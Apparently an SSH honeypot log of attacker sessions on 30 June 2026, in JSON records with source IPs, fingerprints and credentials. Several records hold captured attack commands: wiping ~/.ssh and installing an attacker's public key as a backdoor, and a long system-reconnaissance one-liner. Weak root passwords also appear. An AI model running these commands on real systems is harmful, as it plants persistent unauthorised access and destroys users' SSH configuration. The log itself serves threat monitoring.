Autonomous probing activity normalized. Remote entity established connection but deferred authentication.
{
"id": "76c8e76e849a",
"src_ip": "118.145.131.27",
"start_time": "2026-06-30T18:36:07.858735Z",
"end_time": "2026-06-30T18:38:07.899610Z",
"duration": "120.0",
"version": null,
"hassh": null,
"attempts": [],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 10,
"tags": []
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: mykim
{
"id": "30f6faa9d2a2",
"src_ip": "211.106.137.135",
"start_time": "2026-06-30T18:33:53.842238Z",
"end_time": "2026-06-30T18:33:55.893513Z",
"duration": "2.0",
"version": "SSH-2.0-libssh_0.9.6",
"hassh": "f555226df1963d1d3c09daf865abdc9a",
"attempts": [
{
"user": "mykim",
"pass": "mykim"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Credential acceptance event recorded. Target authentication: ubuntu / q
Remote entity achieved interactive shell state. Command sequence (1 executed):
{
"id": "c093ceeff5b9",
"src_ip": "185.242.3.195",
"start_time": "2026-06-30T18:30:59.652791Z",
"end_time": "2026-06-30T18:31:00.831134Z",
"duration": "1.2",
"version": "SSH-2.0-Go",
"hassh": "16443846184eafde36765c9bab2f4397",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "ubuntu",
"pass": "q"
},
"commands": [
"echo OK"
],
"detailed_commands": [
{
"cmd": "echo OK",
"failed": false,
"error": null
}
],
"failed_commands": [],
"score": 80,
"tags": [
"COMMANDS RUN",
"SUCCESSFUL LOGIN"
]
}Credential acceptance event recorded. Target authentication: root / blackcat
Remote entity achieved interactive shell state. Command sequence (1 executed):
{
"id": "b26bf6528c37",
"src_ip": "212.227.203.59",
"start_time": "2026-06-30T18:02:55.707123Z",
"end_time": "2026-06-30T18:02:57.459659Z",
"duration": "1.7",
"version": "SSH-2.0-Go",
"hassh": "16443846184eafde36765c9bab2f4397",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "blackcat"
},
"commands": [
"uname -a"
],
"detailed_commands": [
{
"cmd": "uname -a",
"failed": false,
"error": null
}
],
"failed_commands": [],
"score": 100,
"tags": [
"COMMANDS RUN",
"RECONNAISSANCE",
"SUCCESSFUL LOGIN"
]
}Autonomous probing activity normalized. Remote entity established connection but deferred authentication.
{
"id": "5cd4b118bc16",
"src_ip": "192.168.0.1",
"start_time": "2026-06-30T17:55:10.354279Z",
"end_time": "2026-06-30T17:55:10.365499Z",
"duration": "0.0",
"version": null,
"hassh": null,
"attempts": [],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": []
}Autonomous probing activity normalized. Remote entity established connection but deferred authentication.
{
"id": "05a08a60e804",
"src_ip": "44.204.234.247",
"start_time": "2026-06-30T17:42:37.391482Z",
"end_time": "2026-06-30T17:42:37.529852Z",
"duration": "0.1",
"version": "SSH-2.0-Go",
"hassh": "9052c4ab4164c78256e71143dcfc7eac",
"attempts": [],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": []
}Autonomous probing activity normalized. Remote entity established connection but deferred authentication.
{
"id": "462890110fa0",
"src_ip": "117.72.195.41",
"start_time": "2026-06-30T17:34:36.840648Z",
"end_time": "2026-06-30T17:36:36.863896Z",
"duration": "120.0",
"version": "SSH-2.0-libssh2_1.11.1",
"hassh": null,
"attempts": [],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 10,
"tags": []
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: ianboen
{
"id": "e9e60ff080e2",
"src_ip": "101.100.194.252",
"start_time": "2026-06-30T17:34:17.913509Z",
"end_time": "2026-06-30T17:34:20.070943Z",
"duration": "2.2",
"version": "SSH-2.0-Go",
"hassh": "16443846184eafde36765c9bab2f4397",
"attempts": [
{
"user": "ianboen",
"pass": "ianboen.2026"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Credential acceptance event recorded. Target authentication: root / blackcat
Remote entity achieved interactive shell state. Command sequence (1 executed):
{
"id": "1826d312196f",
"src_ip": "87.106.239.83",
"start_time": "2026-06-30T17:28:49.458759Z",
"end_time": "2026-06-30T17:28:50.614928Z",
"duration": "1.2",
"version": "SSH-2.0-Go",
"hassh": "16443846184eafde36765c9bab2f4397",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "blackcat"
},
"commands": [
"uname -a"
],
"detailed_commands": [
{
"cmd": "uname -a",
"failed": false,
"error": null
}
],
"failed_commands": [],
"score": 100,
"tags": [
"COMMANDS RUN",
"RECONNAISSANCE",
"SUCCESSFUL LOGIN"
]
}Credential acceptance event recorded. Target authentication: root / 3245gs5662d34
{
"id": "9d0df3e2ffbc",
"src_ip": "103.86.180.10",
"start_time": "2026-06-30T17:23:21.897702Z",
"end_time": "2026-06-30T17:23:23.445596Z",
"duration": "1.5",
"version": "SSH-2.0-libssh_0.9.6",
"hassh": "f555226df1963d1d3c09daf865abdc9a",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "3245gs5662d34"
},
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 50,
"tags": [
"SUCCESSFUL LOGIN"
]
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: 345gs5662d34
{
"id": "48c279b3d7c4",
"src_ip": "103.86.180.10",
"start_time": "2026-06-30T17:23:19.144634Z",
"end_time": "2026-06-30T17:23:21.650208Z",
"duration": "2.5",
"version": "SSH-2.0-libssh_0.9.6",
"hassh": "f555226df1963d1d3c09daf865abdc9a",
"attempts": [
{
"user": "345gs5662d34",
"pass": "345gs5662d34"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Credential acceptance event recorded. Target authentication: root / Secur1ty
Remote entity achieved interactive shell state. Command sequence (2 executed):
{
"id": "42d4639514f7",
"src_ip": "103.86.180.10",
"start_time": "2026-06-30T17:23:15.802435Z",
"end_time": "2026-06-30T17:23:23.441801Z",
"duration": "7.6",
"version": "SSH-2.0-libssh_0.9.6",
"hassh": "f555226df1963d1d3c09daf865abdc9a",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "Secur1ty"
},
"commands": [
"cd ~; chattr -ia .ssh; lockr -ia .ssh",
"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~"
],
"detailed_commands": [
{
"cmd": "cd ~; chattr -ia .ssh; lockr -ia .ssh",
"failed": true,
"error": "Command not found: lockr -ia .ssh"
},
{
"cmd": "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~",
"failed": false,
"error": null
}
],
"failed_commands": [
"lockr -ia .ssh"
],
"score": 80,
"tags": [
"COMMANDS RUN",
"SUCCESSFUL LOGIN"
]
}Autonomous probing activity normalized. Remote entity established connection but deferred authentication.
{
"id": "3521bce03216",
"src_ip": "211.97.69.110",
"start_time": "2026-06-30T17:21:54.102950Z",
"end_time": "2026-06-30T17:23:54.137837Z",
"duration": "120.0",
"version": null,
"hassh": null,
"attempts": [],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 10,
"tags": []
}Credential acceptance event recorded. Target authentication: root / 3245gs5662d34
{
"id": "cecdcf807805",
"src_ip": "136.228.161.66",
"start_time": "2026-06-30T17:16:23.056623Z",
"end_time": "2026-06-30T17:16:24.879911Z",
"duration": "1.8",
"version": "SSH-2.0-libssh_0.9.6",
"hassh": "f555226df1963d1d3c09daf865abdc9a",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "3245gs5662d34"
},
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 50,
"tags": [
"SUCCESSFUL LOGIN"
]
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: 345gs5662d34
{
"id": "92556218bcb5",
"src_ip": "136.228.161.66",
"start_time": "2026-06-30T17:16:20.043227Z",
"end_time": "2026-06-30T17:16:22.757882Z",
"duration": "2.7",
"version": "SSH-2.0-libssh_0.9.6",
"hassh": "f555226df1963d1d3c09daf865abdc9a",
"attempts": [
{
"user": "345gs5662d34",
"pass": "345gs5662d34"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Credential acceptance event recorded. Target authentication: root / un1v3rs3
Remote entity achieved interactive shell state. Command sequence (2 executed):
{
"id": "f370a11ff3f1",
"src_ip": "136.228.161.66",
"start_time": "2026-06-30T17:16:16.483256Z",
"end_time": "2026-06-30T17:16:24.868756Z",
"duration": "8.4",
"version": "SSH-2.0-libssh_0.9.6",
"hassh": "f555226df1963d1d3c09daf865abdc9a",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "un1v3rs3"
},
"commands": [
"cd ~; chattr -ia .ssh; lockr -ia .ssh",
"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~"
],
"detailed_commands": [
{
"cmd": "cd ~; chattr -ia .ssh; lockr -ia .ssh",
"failed": true,
"error": "Command not found: lockr -ia .ssh"
},
{
"cmd": "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~",
"failed": false,
"error": null
}
],
"failed_commands": [
"lockr -ia .ssh"
],
"score": 80,
"tags": [
"COMMANDS RUN",
"SUCCESSFUL LOGIN"
]
}Credential acceptance event recorded. Target authentication: root / 3245gs5662d34
{
"id": "98085cb219d9",
"src_ip": "170.0.61.70",
"start_time": "2026-06-30T17:11:58.372220Z",
"end_time": "2026-06-30T17:11:59.241228Z",
"duration": "0.9",
"version": "SSH-2.0-libssh_0.9.6",
"hassh": "f555226df1963d1d3c09daf865abdc9a",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "3245gs5662d34"
},
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 50,
"tags": [
"SUCCESSFUL LOGIN"
]
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: 345gs5662d34
{
"id": "72d7040680f7",
"src_ip": "170.0.61.70",
"start_time": "2026-06-30T17:11:56.374936Z",
"end_time": "2026-06-30T17:11:58.237514Z",
"duration": "1.9",
"version": "SSH-2.0-libssh_0.9.6",
"hassh": "f555226df1963d1d3c09daf865abdc9a",
"attempts": [
{
"user": "345gs5662d34",
"pass": "345gs5662d34"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Credential acceptance event recorded. Target authentication: root / Server_2023
Remote entity achieved interactive shell state. Command sequence (2 executed):
{
"id": "3c6b18eb3fba",
"src_ip": "170.0.61.70",
"start_time": "2026-06-30T17:11:54.403556Z",
"end_time": "2026-06-30T17:11:59.238226Z",
"duration": "4.8",
"version": "SSH-2.0-libssh_0.9.6",
"hassh": "f555226df1963d1d3c09daf865abdc9a",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "Server_2023"
},
"commands": [
"cd ~; chattr -ia .ssh; lockr -ia .ssh",
"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~"
],
"detailed_commands": [
{
"cmd": "cd ~; chattr -ia .ssh; lockr -ia .ssh",
"failed": true,
"error": "Command not found: lockr -ia .ssh"
},
{
"cmd": "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~",
"failed": false,
"error": null
}
],
"failed_commands": [
"lockr -ia .ssh"
],
"score": 80,
"tags": [
"COMMANDS RUN",
"SUCCESSFUL LOGIN"
]
}Credential acceptance event recorded. Target authentication: root / 1234
Remote entity achieved interactive shell state. Command sequence (9 executed):
{
"id": "9c14b18ba076",
"src_ip": "2.57.122.150",
"start_time": "2026-06-30T17:04:05.036926Z",
"end_time": "2026-06-30T17:04:06.295185Z",
"duration": "1.3",
"version": "SSH-2.0-Go",
"hassh": "2ec37a7cc8daf20b10e1ad6221061ca5",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "1234"
},
"commands": [
"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '\"' ) || echo \"\"); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q \"lm\" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 8\" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 7\" /proc/cpuinfo && echo armv7l ) || echo \"\"); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c \"^processor\" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E \"model name|Hardware\" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep \"Model name\"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 2>/dev/null; } ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; echo '===DONE===' ) 2>&1 ); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"LAST:$last_output\"; echo \"FILTER:$filter_output\"",
"uname -s -v -n -m 2 > /dev/null",
"/bin/uname -s -v -n -m 2 > /dev/null",
"/usr/bin/uname -s -v -n -m 2 > /dev/null",
"busybox uname -s -v -n -m 2 > /dev/null",
"( [ -f /proc/version ]",
"[ -f /proc/version ]",
"head -1 /proc/version | cut -d -f1",
"[ -f /etc/os-release ]"
],
"detailed_commands": [
{
"cmd": "export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '\"' ) || echo \"\"); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q \"lm\" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 8\" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 7\" /proc/cpuinfo && echo armv7l ) || echo \"\"); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c \"^processor\" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E \"model name|Hardware\" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep \"Model name\"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 2>/dev/null; } ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; echo '===DONE===' ) 2>&1 ); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"LAST:$last_output\"; echo \"FILTER:$filter_output\"",
"failed": false,
"error": null
},
{
"cmd": "uname -s -v -n -m 2 > /dev/null",
"failed": false,
"error": null
},
{
"cmd": "/bin/uname -s -v -n -m 2 > /dev/null",
"failed": false,
"error": null
},
{
"cmd": "/usr/bin/uname -s -v -n -m 2 > /dev/null",
"failed": true,
"error": "Command not found: /usr/bin/uname -s -v -n -m"
},
{
"cmd": "busybox uname -s -v -n -m 2 > /dev/null",
"failed": false,
"error": null
},
{
"cmd": "( [ -f /proc/version ]",
"failed": false,
"error": null
},
{
"cmd": "[ -f /proc/version ]",
"failed": false,
"error": null
},
{
"cmd": "head -1 /proc/version | cut -d -f1",
"failed": false,
"error": null
},
{
"cmd": "[ -f /etc/os-release ]",
"failed": false,
"error": null
}
],
"failed_commands": [
"/usr/bin/uname -s -v -n -m"
],
"score": 200,
"tags": [
"COMMANDS RUN",
"RECONNAISSANCE",
"SUCCESSFUL LOGIN"
]
}Credential acceptance event recorded. Target authentication: root / 3245gs5662d34
{
"id": "91c1c3923800",
"src_ip": "43.153.204.181",
"start_time": "2026-06-30T17:02:05.873745Z",
"end_time": "2026-06-30T17:02:07.013396Z",
"duration": "1.1",
"version": "SSH-2.0-libssh_0.9.6",
"hassh": "f555226df1963d1d3c09daf865abdc9a",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "3245gs5662d34"
},
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 50,
"tags": [
"SUCCESSFUL LOGIN"
]
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: 345gs5662d34
{
"id": "ea1eef953ab5",
"src_ip": "43.153.204.181",
"start_time": "2026-06-30T17:02:03.566847Z",
"end_time": "2026-06-30T17:02:05.695731Z",
"duration": "2.1",
"version": "SSH-2.0-libssh_0.9.6",
"hassh": "f555226df1963d1d3c09daf865abdc9a",
"attempts": [
{
"user": "345gs5662d34",
"pass": "345gs5662d34"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Credential acceptance event recorded. Target authentication: root / woaini520...
Remote entity achieved interactive shell state. Command sequence (2 executed):
{
"id": "dcb2baa5e3a7",
"src_ip": "43.153.204.181",
"start_time": "2026-06-30T17:01:57.506858Z",
"end_time": "2026-06-30T17:02:07.009782Z",
"duration": "9.5",
"version": "SSH-2.0-libssh_0.9.6",
"hassh": "f555226df1963d1d3c09daf865abdc9a",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "woaini520..."
},
"commands": [
"cd ~; chattr -ia .ssh; lockr -ia .ssh",
"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~"
],
"detailed_commands": [
{
"cmd": "cd ~; chattr -ia .ssh; lockr -ia .ssh",
"failed": true,
"error": "Command not found: lockr -ia .ssh"
},
{
"cmd": "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~",
"failed": false,
"error": null
}
],
"failed_commands": [
"lockr -ia .ssh"
],
"score": 80,
"tags": [
"COMMANDS RUN",
"SUCCESSFUL LOGIN"
]
}Credential acceptance event recorded. Target authentication: root / webadmin
Remote entity achieved interactive shell state. Command sequence (1 executed):
{
"id": "220fa025a355",
"src_ip": "185.242.3.195",
"start_time": "2026-06-30T16:59:13.131248Z",
"end_time": "2026-06-30T16:59:14.295359Z",
"duration": "1.2",
"version": "SSH-2.0-Go",
"hassh": "16443846184eafde36765c9bab2f4397",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "webadmin"
},
"commands": [
"echo OK"
],
"detailed_commands": [
{
"cmd": "echo OK",
"failed": false,
"error": null
}
],
"failed_commands": [],
"score": 80,
"tags": [
"COMMANDS RUN",
"SUCCESSFUL LOGIN"
]
}Autonomous probing activity normalized. Remote entity established connection but deferred authentication.
{
"id": "f7e700282980",
"src_ip": "218.13.157.209",
"start_time": "2026-06-30T16:58:48.461531Z",
"end_time": "2026-06-30T17:00:48.500434Z",
"duration": "120.0",
"version": null,
"hassh": null,
"attempts": [],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 10,
"tags": []
}Credential acceptance event recorded. Target authentication: root / 123321
Remote entity achieved interactive shell state. Command sequence (9 executed):
{
"id": "826b52c8e503",
"src_ip": "2.57.122.150",
"start_time": "2026-06-30T16:56:19.145650Z",
"end_time": "2026-06-30T16:56:20.406041Z",
"duration": "1.3",
"version": "SSH-2.0-Go",
"hassh": "2ec37a7cc8daf20b10e1ad6221061ca5",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "123321"
},
"commands": [
"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '\"' ) || echo \"\"); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q \"lm\" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 8\" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 7\" /proc/cpuinfo && echo armv7l ) || echo \"\"); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c \"^processor\" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E \"model name|Hardware\" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep \"Model name\"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 